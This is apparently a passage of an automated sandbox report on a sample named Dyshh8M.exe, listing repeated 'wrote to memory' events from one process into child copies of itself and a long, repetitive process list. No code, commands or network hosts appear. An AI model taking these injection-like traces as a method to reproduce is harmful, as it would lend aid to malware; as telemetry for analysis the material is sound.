PID 2308 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 2308 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

